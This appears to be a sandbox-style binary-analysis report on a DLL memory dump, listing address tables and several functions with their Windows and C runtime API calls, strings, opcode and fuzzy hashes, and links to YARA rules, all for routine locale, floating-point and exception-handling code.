0x6e1b095a
0x6e1b095a
0x6e1b095a
0x6e1b0968
0x6e1b096a
0x00000000
0x6e1b0970
0x6e1b0972
0x6e1b0974
0x6e1b098a
0x6e1b098e
0x6e1b0991
0x6e1b0991
0x6e1b0976
0x6e1b0976
0x6e1b097e
0x6e1b0980
0x6e1b0983
0x6e1b0983
0x6e1b0997
0x6e1b0999
0x6e1b099c
0x6e1b099e
0x6e1b09b0
0x6e1b09b0
0x00000000
0x6e1b09a0
0x6e1b09a0
0x6e1b09a6
0x6e1b09ac
0x00000000
0x00000000
0x6e1b09b6
0x6e1b09b6
0x6e1b09b8
0x6e1b09ba
0x6e1b09c8
0x6e1b09c8
0x6e1b09bc
0x6e1b09c1
0x6e1b09c1
0x6e1b09cf
0x6e1b09d2
0x6e1b09d4
0x6e1b09de
0x6e1b09e0
0x6e1b09e2
0x6e1b09ec
0x6e1b09e4
0x6e1b09e4
0x6e1b09e4
0x6e1b09f4
0x00000000
0x6e1b09f6
0x6e1b09f6
0x6e1b09fc
0x00000000
0x00000000
0x00000000
0x6e1b09fc
0x6e1b09d6
0x6e1b09d6
0x6e1b09dc
0x00000000
0x00000000
0x00000000
0x6e1b09dc
0x6e1b09d4
0x6e1b099e
0x6e1b096a
0x00000000
0x6e1b08f0
0x6e1b0136
0x6e1b013b
0x6e1b013d
0x6e1b013f
0x00000000
0x00000000
0x6e1b0145
0x6e1b0147
0x00000000
0x00000000
0x6e1b0176
0x6e1b017d
0x6e1b0180
0x6e1b05e9
0x6e1b05e9
0x00000000
0x6e1b05e9
0x6e1b0130
0x6e1affe3
0x6e1affe3
0x6e1affe8
0x00000000
0x00000000
0x6e1affee
0x6e1afff3
0x00000000
0x00000000
0x00000000
0x6e1afff3
0x6e1affab
0x6e1affb0
0x6e1affb5
0x00000000
0x00000000
0x6e1affbb
0x00000000
0x6e1affbb
0x6e1affa9
0x6e1aff64
0x6e1aff02
0x6e1aff05
0x00000000
0x00000000
0x00000000

APIs

operator+.LIBVCRUNTIME ref: 6E1AFF30
DName::operator+.LIBCMT ref: 6E1B0084
DName::operator+.LIBCMT ref: 6E1B00A1

Strings

/, xrefs: 6E1B07C8

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Name::operator+$operator+
String ID: /
API String ID: 1595903985-2043925204
Opcode ID: 856327f845e4e737c02c44f1129fac0f9c84336eb72bc00f16288dc8bcfdc450
Instruction ID: 009ff81bbd1861030c748deebbae4e95905aee72c5b2673ecd92959cde2cdfa4
Opcode Fuzzy Hash: 856327f845e4e737c02c44f1129fac0f9c84336eb72bc00f16288dc8bcfdc450
Instruction Fuzzy Hash: 6E825376D10209DFDF45CBE8C9A0BEEB7B8BF58344F20452AE525E7280EB349985DB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DEECF, Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 251COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

GetACP.KERNEL32(?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 6E1DEF90
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,6E1D0423,?,?,?,00000055,?,-00000050,?,?), ref: 6E1DEFBB
_wcschr.LIBVCRUNTIME ref: 6E1DF04F
_wcschr.LIBVCRUNTIME ref: 6E1DF05D
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 6E1DF11E

Strings

utf8, xrefs: 6E1DF08D

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast_wcschr$CodeInfoLocalePageValid
String ID: utf8
API String ID: 4147378913-905460609
Opcode ID: d42e11387394c4ca089d28538f69e827f82be10d63587a9a9a9708dab06e7b08
Instruction ID: fcc2f03058cd77943056eb03dccd44505359c51f4753464fde7a78b7267f4403
Opcode Fuzzy Hash: d42e11387394c4ca089d28538f69e827f82be10d63587a9a9a9708dab06e7b08
Instruction Fuzzy Hash: 3F711A32A10206AAE714DFF5CC45AEBB3BCEF58705F204469E525D7180EB71EAC8E761

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E153C, Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E1E16B7

Strings

1#IND, xrefs: 6E1E2847
1#INF, xrefs: 6E1E2872
1#QNAN, xrefs: 6E1E2855
1#SNAN, xrefs: 6E1E284E

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 3c424619a895ca10eb653bacb22e966c1b079bbbdc679380cb0a6cba5ae251e4
Instruction ID: e931aee47fea1efa7e9a72242e3d54bcbdd6d5902be58b2d47af5ba3d594e64e
Opcode Fuzzy Hash: 3c424619a895ca10eb653bacb22e966c1b079bbbdc679380cb0a6cba5ae251e4
Instruction Fuzzy Hash: 4DC24971E08A298FDB64CFA8C9507D9B3B5EB59304F1541EAE80DA3640E774AEC5DF80

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF679, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF712
GetLocaleInfoW.KERNEL32(?,20001004,6E1DF997,00000002,00000000,?,?,?,6E1DF997,?,00000000), ref: 6E1DF73B
GetACP.KERNEL32(?,?,6E1DF997,?,00000000), ref: 6E1DF750

Strings

ACP, xrefs: 6E1DF697
OCP, xrefs: 6E1DF6CD

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction ID: cce3889d74054d3dde4e500e9e911cf9744d65b122a1351814f7a9dfa2310df5
Opcode Fuzzy Hash: d6b75376c052fba3d35eb7db3deeb24b9548088bb003d9903a779e48f7ee3651
Instruction Fuzzy Hash: 7D21C432A54101AAE7608FE5C944AC773B6EF68B60B728414E935D7218E732DFC5E350

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF84E, Relevance: 7.7, APIs: 5, Instructions: 183COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7AB
Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7E1

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 6E1DF95A
IsValidCodePage.KERNEL32(00000000), ref: 6E1DF9A3
IsValidLocale.KERNEL32(?,00000001), ref: 6E1DF9B2
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 6E1DF9FA
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 6E1DFA19

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Locale$ErrorInfoLastValid_free$CodeDefaultPageUser
String ID:
API String ID: 949163717-0
Opcode ID: c57a5f182c15b846d3121425ad0acb95a4e824e400706b94ca306f20c76a80ed
Instruction ID: 8909db9d014c77ecd0a065871c5c95f97eba3c3e4ab4e7b99410db9c056447bc
Opcode Fuzzy Hash: c57a5f182c15b846d3121425ad0acb95a4e824e400706b94ca306f20c76a80ed
Instruction Fuzzy Hash: 85515E71D0060AAAEF44DFE5CC44AAE77B9AF19704F204429A921EB150E7709A89EB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DF300, Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 6E1CF749: GetLastError.KERNEL32(00000008,?,00000000,6E1D8773,6E1913C8,6E191439,?,6E191225,00000000,00000000), ref: 6E1CF74E
Part of subcall function 6E1CF749: SetLastError.KERNEL32(00000000,00000007,000000FF,?,6E191225,00000000,00000000), ref: 6E1CF7EC

Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7AB
Part of subcall function 6E1CF749: _free.LIBCMT ref: 6E1CF7E1

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1DF354
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1DF39E
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 6E1DF464

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale$ErrorLast_free
String ID:
API String ID: 3140898709-0
Opcode ID: ef74845618353f79f79a50d29e1ae4228e5c960c5849bbd0a4d845a06653e34c
Instruction ID: 6dfae66eb7ac44251f502fff6de36b3307e7c34b73f4035e9b096a79da231914
Opcode Fuzzy Hash: ef74845618353f79f79a50d29e1ae4228e5c960c5849bbd0a4d845a06653e34c
Instruction Fuzzy Hash: E06190719541079FEB65CFA8D891BAAB3B8FF19310F308169E924C6184E734DAC9EB50

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DAAA5, Relevance: 4.7, APIs: 3, Instructions: 171timeCOMMON

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6E1F61D0), ref: 6E1DAB0F
_free.LIBCMT ref: 6E1DAAFD

Part of subcall function 6E1D1BE4: HeapFree.KERNEL32(00000000,00000000,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?), ref: 6E1D1BFA
Part of subcall function 6E1D1BE4: GetLastError.KERNEL32(?,?,6E1DDFED,?,00000000,?,?,?,6E1DE2F1,?,00000007,?,?,6E1DD69F,?,?), ref: 6E1D1C0C

_free.LIBCMT ref: 6E1DACC9

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 2155170405-0
Opcode ID: 1646f9d7725c608663d0fa2529bca68de76dc7ed3294119aac2802454998222d
Instruction ID: 55b9638a8551f26a5786ba2e92ae371a37ff3e52e9d2c0fe97733b301aa7c29e
Opcode Fuzzy Hash: 1646f9d7725c608663d0fa2529bca68de76dc7ed3294119aac2802454998222d
Instruction Fuzzy Hash: 4851E8B2900609EFDB10DFE9CC849EE77BEFF55354B20456AD41097280EB309AC9EB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB953, Relevance: 4.6, APIs: 3, Instructions: 132fileCOMMON

Download Yara Rule

APIs

FindFirstFileExA.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,?,00000000), ref: 6E1DB9EE
FindNextFileA.KERNEL32(00000000,?), ref: 6E1DBA6C
FindClose.KERNEL32(00000000), ref: 6E1DBAAE

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Find$File$CloseFirstNext
String ID:
API String ID: 3541575487-0
Opcode ID: d2db85374c54c02cc30a793e98d338f2f56bd7f02fe2ac4382266a784ca30d05
Instruction ID: 1b1f39b01b6d83a231f589b17442140c0ec1ceb73873c206a7aa9b7925787f0c
Opcode Fuzzy Hash: d2db85374c54c02cc30a793e98d338f2f56bd7f02fe2ac4382266a784ca30d05
Instruction Fuzzy Hash: EA41D672900619AEDB24DFA9CC8CDEBB77DEBC5704F104599E416D3148EA309EC8DB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C20F2, Relevance: 4.6, APIs: 3, Instructions: 77COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000010), ref: 6E1C21EA
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000010), ref: 6E1C21F4
UnhandledExceptionFilter.KERNEL32(-00000318,?,?,?,?,?,00000010), ref: 6E1C2201

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 76d58724c030bc7d6b9527214e5569627ec6461dbe96603266c4f1cf3f2a22d6
Instruction ID: 434cd9b7dd329c4389a31caa922b7cb08db64a418aac9334339f28fd83124df4
Opcode Fuzzy Hash: 76d58724c030bc7d6b9527214e5569627ec6461dbe96603266c4f1cf3f2a22d6
Instruction Fuzzy Hash: 8B31F5749012189BCB21DFA8D8887DCB7B8BF18310F2045EAE90CA7250E7349BC1DF44

Uniqueness

Uniqueness Score: -1.00%

Function 6E1CD988, Relevance: 4.5, APIs: 3, Instructions: 20COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008,?,6E1CD987,?,E402A6C3,00000008,?,00000008,6E17DD7A), ref: 6E1CD9AA
TerminateProcess.KERNEL32(00000000,?,6E1CD987,?,E402A6C3,00000008,?,00000008,6E17DD7A), ref: 6E1CD9B1
ExitProcess.KERNEL32 ref: 6E1CD9C3

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: e8ef95b8e99fd350e525ea6e2f2c39688c95d8b2ac1e0308585f9bf6a0ef08ec
Instruction ID: 3d11537e475cf6120c7992fd8ddb4e2b6155eeb93cc36bbe3f5ce05850222cb8
Opcode Fuzzy Hash: e8ef95b8e99fd350e525ea6e2f2c39688c95d8b2ac1e0308585f9bf6a0ef08ec
Instruction Fuzzy Hash: 06E04631040648AFCF11AB90C908A9C3B78EB61A45B504420F906C6520CB3ADAC1EB93

Uniqueness

Uniqueness Score: -1.00%

Function 6E1C9C10, Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cce8b45002c7b814ed842695b7dd88d44f315911a7bd094a8d9d0db0731b0cb7
Instruction ID: 56b5c493b2510050413a53bf4a6efb69f278205a8e7012b03cb3a1197b905cb2
Opcode Fuzzy Hash: cce8b45002c7b814ed842695b7dd88d44f315911a7bd094a8d9d0db0731b0cb7
Instruction Fuzzy Hash: 3CF19E71E002199FDF14CFA8C8906DEBBB1FF98718F258269D919EB344D734AA41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E855D, Relevance: 3.1, APIs: 2, Instructions: 55COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(6E2224D0,00000000,?,6E1E6995,6E2224D0,Microsoft Visual C++ Runtime Library,00012010), ref: 6E1E8478
OutputDebugStringW.KERNEL32(6E2224D0,?,6E1E6995,6E2224D0,Microsoft Visual C++ Runtime Library,00012010), ref: 6E1E848F

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: DebugDebuggerOutputPresentString
String ID:
API String ID: 4086329628-0
Opcode ID: 5f6ce89f164a67974f46e1f7cce3ae4a3a4046b99ae66ff44fa0ead85119f31f
Instruction ID: 99c271ef4403a5a55f45bc866d7e488e5649f6268aced1149cd54497817f2bfe
Opcode Fuzzy Hash: 5f6ce89f164a67974f46e1f7cce3ae4a3a4046b99ae66ff44fa0ead85119f31f
Instruction Fuzzy Hash: 0401F232045B297BDF609BE24C00BEF375CEF02268F2D4801FA299A440CB22C8C1B2A1

Uniqueness

Uniqueness Score: -1.00%

Function 6E197055, Relevance: 3.0, APIs: 2, Instructions: 21COMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(?,?,6E1A91B9,?,00000022,00000000,00000002,?,?,6E1A727C,00000000,?,00000004,6E1A5F46,?,00000004), ref: 6E197077
GetLocaleInfoW.KERNEL32(00000000,00000008,?,00000000,?,?,6E1A91B9,?,00000022,00000000,00000002,?,?,6E1A727C,00000000,?), ref: 6E197082

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: ee32568a129edac0522f5d5defd90a3538e0d7038d73867a2cfe6059e70075f3
Instruction ID: af8da671c8416ae7a37b25ac972f29a4994852d53f475e2f2a46350590865352
Opcode Fuzzy Hash: ee32568a129edac0522f5d5defd90a3538e0d7038d73867a2cfe6059e70075f3
Instruction Fuzzy Hash: 1FE01232500928EF8F126FD5DC098EE7F29EF06760B088016F90956190DB329DA0BBE6

Uniqueness

Uniqueness Score: -1.00%

Function 6E1E0242, Relevance: 2.7, APIs: 1, Instructions: 1236COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 6E1E02BF

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: __floor_pentium4
String ID:
API String ID: 4168288129-0
Opcode ID: 4115c80c2b0f0bae1515e04d7316cf4d32b56e2e7c52c10bd6449ac5306912aa
Instruction ID: abd0df506081005383eb468d69aa41322e393b6f9b547d21876a2993dc30ebf0
Opcode Fuzzy Hash: 4115c80c2b0f0bae1515e04d7316cf4d32b56e2e7c52c10bd6449ac5306912aa
Instruction Fuzzy Hash: 76B24871E08A298FDB64CE68DC507DAB3B5EB84304F1501EAE84DE7640EB74AEC59F41

Uniqueness

Uniqueness Score: -1.00%

Function 6E186520, Relevance: 1.8, APIs: 1, Instructions: 300COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E186527

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: d994fe3d06078e51fdb02edf53fe3a835a09016bff799d4030fa679bc3043b9a
Instruction ID: a30e4f59f5bae519860602fe37f73286bf803b7d3892ea620f0b64cbd6b824ca
Opcode Fuzzy Hash: d994fe3d06078e51fdb02edf53fe3a835a09016bff799d4030fa679bc3043b9a
Instruction Fuzzy Hash: FDB19DB0A7060ADFDB04CFA8C490AABB7F2BF56304B644519D4659B650D731F8E1EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E18856E, Relevance: 1.8, APIs: 1, Instructions: 297COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6E188575

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3
String ID:
API String ID: 431132790-0
Opcode ID: 1d35058f0c69c3cae577d64eb5b1af989f86e457297b464c4d05943e9cd788c2
Instruction ID: 72a1e1cf6d3d7a9e2386cf88873313da428bd3c0a7b5709154a166f7fcd67028
Opcode Fuzzy Hash: 1d35058f0c69c3cae577d64eb5b1af989f86e457297b464c4d05943e9cd788c2
Instruction Fuzzy Hash: 06B1BE74A40607DFD755CFA8C490AABB7F2BF4A304BA4451AD8919B680C731F8E1EF90

Uniqueness

Uniqueness Score: -1.00%

Function 6E1D3187, Relevance: 1.8, APIs: 1, Instructions: 274COMMON

Download Yara Rule

APIs

RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,0000FFFF), ref: 6E1D33B4

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512950009.000000006E219000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.512978424.000000006E221000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.512997145.000000006E239000.00000002.00020000.sdmp Download File

Similarity

API ID: ExceptionRaise
String ID:
API String ID: 3997070919-0
Opcode ID: 455abeca1fa4c96e15d2dff09d2635ba3a5b85c2b4be87df57e4eb509247c114
Instruction ID: cf5c9c086fcc36d212e607052175153ca5415bb0b244c51ad9014cbc07aca4d7
Opcode Fuzzy Hash: 455abeca1fa4c96e15d2dff09d2635ba3a5b85c2b4be87df57e4eb509247c114
Instruction Fuzzy Hash: F7B1AC32610609DFDB45CF68C49AB947BF0FF05364F258658E8A9CF2A1C339E986DB40

Uniqueness

Uniqueness Score: -1.00%

Function 6E1DB597, Relevance: 1.7, APIs: 1, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.512148946.000000006E161000.00000020.00020000.sdmp, Offset: 6E160000, based on PE: true

Associated: 00000000.00000002.512100585.000000006E160000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512878682.000000006E1EE000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.512939657.000000006E218000.00000004.00020000.sdmp Download File
